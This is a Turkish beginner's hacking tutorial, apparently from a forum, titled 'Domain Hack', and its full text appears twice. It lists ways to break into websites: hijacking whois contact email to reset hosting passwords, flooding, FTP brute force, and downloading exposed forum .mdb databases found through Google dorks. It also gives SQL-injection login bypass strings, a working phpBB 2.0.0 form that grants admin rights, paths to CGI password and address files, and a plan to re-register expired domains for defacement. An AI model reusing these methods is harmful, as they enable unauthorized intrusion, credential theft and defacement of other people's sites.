DOMAİN HACK
domain hack’e yeni baslayanlar icin gayet güzel anlasilabilir bir döküman .
ir hedef siteye saLdiri yöntemLeri..
Basitten zora dogru bir siraLama yaptim..EkLemek istedikLeriniz warsa ekLeyiniz..
1.Whois
www.arama.com/domain.php3 <http://www.arama.com/domain.php3> ten whois çekiyoruzz..
Eger mynet hotmail yaho faLansa hackLiyoruz.Eger basKaysa onun fake kodunu hazirLiyoruzz.
HackLedigimiz maiLLe hosta gidip sifremizi istetiyoruz..
2.FLood
Denyo Launch War TooL gibi programLarLa fLood yaparak siteyi geçici oLarak erisimi yasakLayabiLiriz(Bandwith oLayi)
Ya da forumLarin anketLere fLood yaparak hata wermeLerini sagLayabiLirz.MeseLa mynetteki anketLere fLooD çekince sifirLaniyor.
Tabi fLoodunda sekiLLeri war.BunLari burada açikLamak istemiyorumm.Ama en etkiLi fLood member regLemektir..AkLinizin bir kösesinde buLunsun..
3.Ftp brute Force..
Cracker Jack vcrack ftp gibi programLarLa ftp sifresini buLmak için brute force yapiLir..
Iyi bir bagLanti we duruma göre kaLiteLi bir wordList gerektirebiLir..
Siz karsidaki ksiye göre kendinizde hazirLayabiLirsinizz..
Bu programLarin kuLLanIMLari forumLarimizda warr...
4.AçikLar.
BeLkide üstünde sayfaLar yaziLabiLecekk böLüm..
Php asp sistemLerin birçok açigi warr.
ASP:
Çok kuLLaniLan webwiz we snitz forumLari (binLerce)
HackLemek çok basit..
snitz forumLari - snitz_forums_2000.mdb
Webwiz forumLari - /admin/wwforum.mdb bu sekIlde main database e uLasip admin sifrelerini accessLe weya baska bir msb browserLa açarak buLabiLirsinizz..Sonra forum sizin emrinizde..
Asp nuke siteLerdede /db/main.mdb denersenizz db Dosyasini buLabiLirsiniz..
*Herhangi bir sitenin mdb si içinse O sitenin üyeLik sistemi portaLini buLarak bunLari aspindir.com dan indirerek db yoLuna bakarsinizz..
BunLar
db/uyelik.mdb /db/members.mdb /db/sifreler.mdb oLabiLir..
Bu sekiLde googLedan aratak rastgeLe sitede hackLeyebiLirsinizz..
Bir mdb buLma yöntemi:
*Asp siteLerde üyeLik sistemLeri site yönetimi için portaLLar geneLLikLe geneL hazir scriptLerden yaziLmistir...
.mdb hackLemek için herkez googLe dan inurl"x.mdb" oLarak aratir..
Simdi benim diyecegi yöntem hiç bi yerde yoq we tamamen benim tarafimdan buyLunmusturr.
www.aspindir.com <http://www.aspindir.com>
www.asparsivi.com <http://www.asparsivi.com>
www.maxiasp.com <http://www.maxiasp.com> siteLerinden hazir bir üyeLik sistemi indiriyoruzz..
MeseLa xp üyeLik sistemini indirin.
Db yoLuna bakin..
Bakiyoruzz..
/db/uyelik.mdb
Simdi googLe! a girip Xp üyeLik sistemi diye aratinn..
Ewet "xp üyelik sistemi" sekLinde aratiginizda karsiniza onLarca sayfa çikacaktir..
Bu iLk 4 sayfada 20 1ye yakin sitede bu açikTan war.
Çikan sonuçLarin db Lerini indirip accessLe açarsanizz sifreLer eLinizdee..
*SqL Injection
user ’or’ sifre: ’or’ bu sekiLde admin girisi yapabiLirsiniz..
*Php
Php sistemLerinde açigi war..
Php-nuke 5.5 te haber ekLeme açigi weya kuLLanici adi:admin sifre:’or true’
GüwenLik açikLari böLümünden sql injection açigina bakarsanizz göreceksiniz..
Phpbb forumLarinda açikLari wardir.MeseLa örnek oLaarak phbb2.0.0 açigi bu forumdan kaLmadi deniLebiLir ama örnek oLsun diye weriyorum.
-------------------------------
<form method="post" action="http://forum sayfasi/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</bOdy>
</html>
---------------------------------
Bu KoD yeni bir üyeye admin yetkisi werir.
Birda phpbb forumLarin 2.0.3 de db.php açigini duydum..
BuLabiLirsem yayinLarim..
Birde bazi .php dosyalarini çaLarak admin sifreLerine uLasabiLiyorduk.
Sanirim config.php diydi.
Bunu FLashget webzip tarzi programLarLa kendi pcmize yükLeyebiLiyoruz..
*php maiLList açigi
GoogLe dan aratip vuLduunuz php maiLListLerin sonuna /ml_config.dat ekLeyerek admin sifresine uLasabiLirsiniz..
*Cgi script açikLari..
WebBBS Scriptleri
----
WebBBS - Bulletin Board System (Bildiri Tahtasi Sistemi) Bu sistem yukarida size örnekledigim gibi siteye mesaj atmak için kullanilir.
Bu sistem bünyesinde bu bildiri tahtalarina üye kimselerin kullanici adi/sifre kombinasyonlarini bulundurur.Böylelikle istediginiz kisi adina
bildiri tahtasina mesaj gönderebilirsiniz.
Açik : http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/
WebAdvert Scriptleri (RekLamLar..)
WebAdverts (WebReklam) Bu scriptler sayesinde site yöneticisi sitede aldigi reklamlari yayinlar.Her reklam için ayri hesap vardir.
Bu açigi kullanarak kendi hazirladiginiz bannerlari sitede yayinlayabilirsiniz.Ayrica diger reklam verenlerin hesaplarini silmek ya da bannerlarini
degistirmek elinizde.
Açik : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt --> Sifrelerin bulundugu .txt ..
WWWBoard Scriptleri
wEBBSS ILe ayni sekiLde..
Açik : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açik : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açik : http://www.hedefsite.com/webboard/password.txt
-------------------------
MaillistLer..
-------------------------
Açik : http://www.hedefsite.com/cgi-bin/mailman/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/maillist/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/mail/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/maillist/users.txt
AçikLARI BuLmak..
Scriptler hakkinda genis bilginiz yoksa ve yukarida örnekledigim türden belirli basli açiklari bilmiyorsaniz Cgi Zayiflik Tarayicilarini kullanmanizi öneririm.
Çesitli tarayicilar var bu alanda,bir kismini deniyebilirsiniz.Önemli olan tarayicinin bünyesinde bulundurdugu açik sayisi.Bu çok önemlidir.Bir tarayici bünyesinde
ne kadar çok açik bulundurursa o kadar sansiniz artar.Tarayicinizin güncelleme seçenegi varsa sik sik yenilemenizi öneriririm.Güncelleme seçenegi yoksa birden fazla
tarayici kullanmalisiniz.Unutmamaniz gereken en önemli nokta ise her buldugunuz scripti hackliyemeyeceginiz.
Size daha pratik bir yol daha söyliyeyim,www.arabul.com <http://www.arabul.com> - www.netbul.com <http://www.netbul.com> gibi siteler kayitli olan web siteleri içerisinde her türlü kelimeyi arama özelligine sahiptir.Bu
tip arama motorlarina metacrawler denir.Yabanci servis olarak size tavsiyem www.webcrawler.com <http://www.webcrawler.com> ya da www.metacrawler.com <http://www.metacrawler.com>.
Örnek Aratabileceginiz kelimeler;
cgi-bin
cgi-bin/örnek.pwd
cgi-bin/password.txt
cgi-bin/örnek.cfg
5.ListPath
En sewdigiim hack yöntemLerinden biridir..
Bir php weya asp kodu çaListirarak o hostun tüm siteLere erisim hakki sagLanir.ELmaLi seker iLk çiktiginda oLay yaratmisti.
Fakat bu ListpathLeri nerden buLacagiz??
Sitemizi inceLeyin we www.kullanilmasiyasaknick <http://www.kullanilmasiyasaknick> a da arada sirada bakinn..
Bu oLay free hostLarda çaLismaz..Denemeyin yani..
HackLemeniz için bi hosttan yer kiraLamaniz Lazim..
6.Domain reg..
Eger hedef site mutLaka hackLenmek zorundaysa hostun bitis tarihi yakinsa hemen bittgi gün hostu domaini ederekte yapabiLirsinizz..Sonra istediiniz gibi index atin cc iLe yapabiLirsiniz bu oLayi..
Yine sitemizde dagitiLiyor..
7.Birtakim bazi açikLar..
Unicode commander.pL gibi eski fakat hakkini wermemiz gereknn açikLar..
Unicode birçok devLet sitesinde duruyor haLa..
Commander.pL service.pwd cgi/bin açikLari bunLardan bahsetmiyorum
eğer gerçekten beğendiyseniz sadece bir tşk yeterlidir (alıntı)
domain hack’e yeni baslayanlar icin gayet güzel anlasilabilir bir döküman .
ir hedef siteye saLdiri yöntemLeri..
Basitten zora dogru bir siraLama yaptim..EkLemek istedikLeriniz warsa ekLeyiniz..
1.Whois
www.arama.com/domain.php3 <http://www.arama.com/domain.php3> ten whois çekiyoruzz..
Eger mynet hotmail yaho faLansa hackLiyoruz.Eger basKaysa onun fake kodunu hazirLiyoruzz.
HackLedigimiz maiLLe hosta gidip sifremizi istetiyoruz..
2.FLood
Denyo Launch War TooL gibi programLarLa fLood yaparak siteyi geçici oLarak erisimi yasakLayabiLiriz(Bandwith oLayi)
Ya da forumLarin anketLere fLood yaparak hata wermeLerini sagLayabiLirz.MeseLa mynetteki anketLere fLooD çekince sifirLaniyor.
Tabi fLoodunda sekiLLeri war.BunLari burada açikLamak istemiyorumm.Ama en etkiLi fLood member regLemektir..AkLinizin bir kösesinde buLunsun..
3.Ftp brute Force..
Cracker Jack vcrack ftp gibi programLarLa ftp sifresini buLmak için brute force yapiLir..
Iyi bir bagLanti we duruma göre kaLiteLi bir wordList gerektirebiLir..
Siz karsidaki ksiye göre kendinizde hazirLayabiLirsinizz..
Bu programLarin kuLLanIMLari forumLarimizda warr...
4.AçikLar.
BeLkide üstünde sayfaLar yaziLabiLecekk böLüm..
Php asp sistemLerin birçok açigi warr.
ASP:
Çok kuLLaniLan webwiz we snitz forumLari (binLerce)
HackLemek çok basit..
snitz forumLari - snitz_forums_2000.mdb
Webwiz forumLari - /admin/wwforum.mdb bu sekIlde main database e uLasip admin sifrelerini accessLe weya baska bir msb browserLa açarak buLabiLirsinizz..Sonra forum sizin emrinizde..
Asp nuke siteLerdede /db/main.mdb denersenizz db Dosyasini buLabiLirsiniz..
*Herhangi bir sitenin mdb si içinse O sitenin üyeLik sistemi portaLini buLarak bunLari aspindir.com dan indirerek db yoLuna bakarsinizz..
BunLar
db/uyelik.mdb /db/members.mdb /db/sifreler.mdb oLabiLir..
Bu sekiLde googLedan aratak rastgeLe sitede hackLeyebiLirsinizz..
Bir mdb buLma yöntemi:
*Asp siteLerde üyeLik sistemLeri site yönetimi için portaLLar geneLLikLe geneL hazir scriptLerden yaziLmistir...
.mdb hackLemek için herkez googLe dan inurl"x.mdb" oLarak aratir..
Simdi benim diyecegi yöntem hiç bi yerde yoq we tamamen benim tarafimdan buyLunmusturr.
www.aspindir.com <http://www.aspindir.com>
www.asparsivi.com <http://www.asparsivi.com>
www.maxiasp.com <http://www.maxiasp.com> siteLerinden hazir bir üyeLik sistemi indiriyoruzz..
MeseLa xp üyeLik sistemini indirin.
Db yoLuna bakin..
Bakiyoruzz..
/db/uyelik.mdb
Simdi googLe! a girip Xp üyeLik sistemi diye aratinn..
Ewet "xp üyelik sistemi" sekLinde aratiginizda karsiniza onLarca sayfa çikacaktir..
Bu iLk 4 sayfada 20 1ye yakin sitede bu açikTan war.
Çikan sonuçLarin db Lerini indirip accessLe açarsanizz sifreLer eLinizdee..
*SqL Injection
user ’or’ sifre: ’or’ bu sekiLde admin girisi yapabiLirsiniz..
*Php
Php sistemLerinde açigi war..
Php-nuke 5.5 te haber ekLeme açigi weya kuLLanici adi:admin sifre:’or true’
GüwenLik açikLari böLümünden sql injection açigina bakarsanizz göreceksiniz..
Phpbb forumLarinda açikLari wardir.MeseLa örnek oLaarak phbb2.0.0 açigi bu forumdan kaLmadi deniLebiLir ama örnek oLsun diye weriyorum.
-------------------------------
<form method="post" action="http://forum sayfasi/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</bOdy>
</html>
---------------------------------
Bu KoD yeni bir üyeye admin yetkisi werir.
Birda phpbb forumLarin 2.0.3 de db.php açigini duydum..
BuLabiLirsem yayinLarim..
Birde bazi .php dosyalarini çaLarak admin sifreLerine uLasabiLiyorduk.
Sanirim config.php diydi.
Bunu FLashget webzip tarzi programLarLa kendi pcmize yükLeyebiLiyoruz..
*php maiLList açigi
GoogLe dan aratip vuLduunuz php maiLListLerin sonuna /ml_config.dat ekLeyerek admin sifresine uLasabiLirsiniz..
*Cgi script açikLari..
WebBBS Scriptleri
----
WebBBS - Bulletin Board System (Bildiri Tahtasi Sistemi) Bu sistem yukarida size örnekledigim gibi siteye mesaj atmak için kullanilir.
Bu sistem bünyesinde bu bildiri tahtalarina üye kimselerin kullanici adi/sifre kombinasyonlarini bulundurur.Böylelikle istediginiz kisi adina
bildiri tahtasina mesaj gönderebilirsiniz.
Açik : http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/
WebAdvert Scriptleri (RekLamLar..)
WebAdverts (WebReklam) Bu scriptler sayesinde site yöneticisi sitede aldigi reklamlari yayinlar.Her reklam için ayri hesap vardir.
Bu açigi kullanarak kendi hazirladiginiz bannerlari sitede yayinlayabilirsiniz.Ayrica diger reklam verenlerin hesaplarini silmek ya da bannerlarini
degistirmek elinizde.
Açik : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt --> Sifrelerin bulundugu .txt ..
WWWBoard Scriptleri
wEBBSS ILe ayni sekiLde..
Açik : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açik : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açik : http://www.hedefsite.com/webboard/password.txt
-------------------------
MaillistLer..
-------------------------
Açik : http://www.hedefsite.com/cgi-bin/mailman/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/maillist/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/mail/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/maillist/users.txt
AçikLARI BuLmak..
Scriptler hakkinda genis bilginiz yoksa ve yukarida örnekledigim türden belirli basli açiklari bilmiyorsaniz Cgi Zayiflik Tarayicilarini kullanmanizi öneririm.
Çesitli tarayicilar var bu alanda,bir kismini deniyebilirsiniz.Önemli olan tarayicinin bünyesinde bulundurdugu açik sayisi.Bu çok önemlidir.Bir tarayici bünyesinde
ne kadar çok açik bulundurursa o kadar sansiniz artar.Tarayicinizin güncelleme seçenegi varsa sik sik yenilemenizi öneriririm.Güncelleme seçenegi yoksa birden fazla
tarayici kullanmalisiniz.Unutmamaniz gereken en önemli nokta ise her buldugunuz scripti hackliyemeyeceginiz.
Size daha pratik bir yol daha söyliyeyim,www.arabul.com <http://www.arabul.com> - www.netbul.com <http://www.netbul.com> gibi siteler kayitli olan web siteleri içerisinde her türlü kelimeyi arama özelligine sahiptir.Bu
tip arama motorlarina metacrawler denir.Yabanci servis olarak size tavsiyem www.webcrawler.com <http://www.webcrawler.com> ya da www.metacrawler.com <http://www.metacrawler.com>.
Örnek Aratabileceginiz kelimeler;
cgi-bin
cgi-bin/örnek.pwd
cgi-bin/password.txt
cgi-bin/örnek.cfg
5.ListPath
En sewdigiim hack yöntemLerinden biridir..
Bir php weya asp kodu çaListirarak o hostun tüm siteLere erisim hakki sagLanir.ELmaLi seker iLk çiktiginda oLay yaratmisti.
Fakat bu ListpathLeri nerden buLacagiz??
Sitemizi inceLeyin we www.kullanilmasiyasaknick <http://www.kullanilmasiyasaknick> a da arada sirada bakinn..
Bu oLay free hostLarda çaLismaz..Denemeyin yani..
HackLemeniz için bi hosttan yer kiraLamaniz Lazim..
6.Domain reg..
Eger hedef site mutLaka hackLenmek zorundaysa hostun bitis tarihi yakinsa hemen bittgi gün hostu domaini ederekte yapabiLirsinizz..Sonra istediiniz gibi index atin cc iLe yapabiLirsiniz bu oLayi..
Yine sitemizde dagitiLiyor..
7.Birtakim bazi açikLar..
Unicode commander.pL gibi eski fakat hakkini wermemiz gereknn açikLar..
Unicode birçok devLet sitesinde duruyor haLa..
Commander.pL service.pwd cgi/bin açikLari bunLardan bahsetmiyorum
eğer gerçekten beğendiyseniz sadece bir tşk yeterlidir (alıntı)
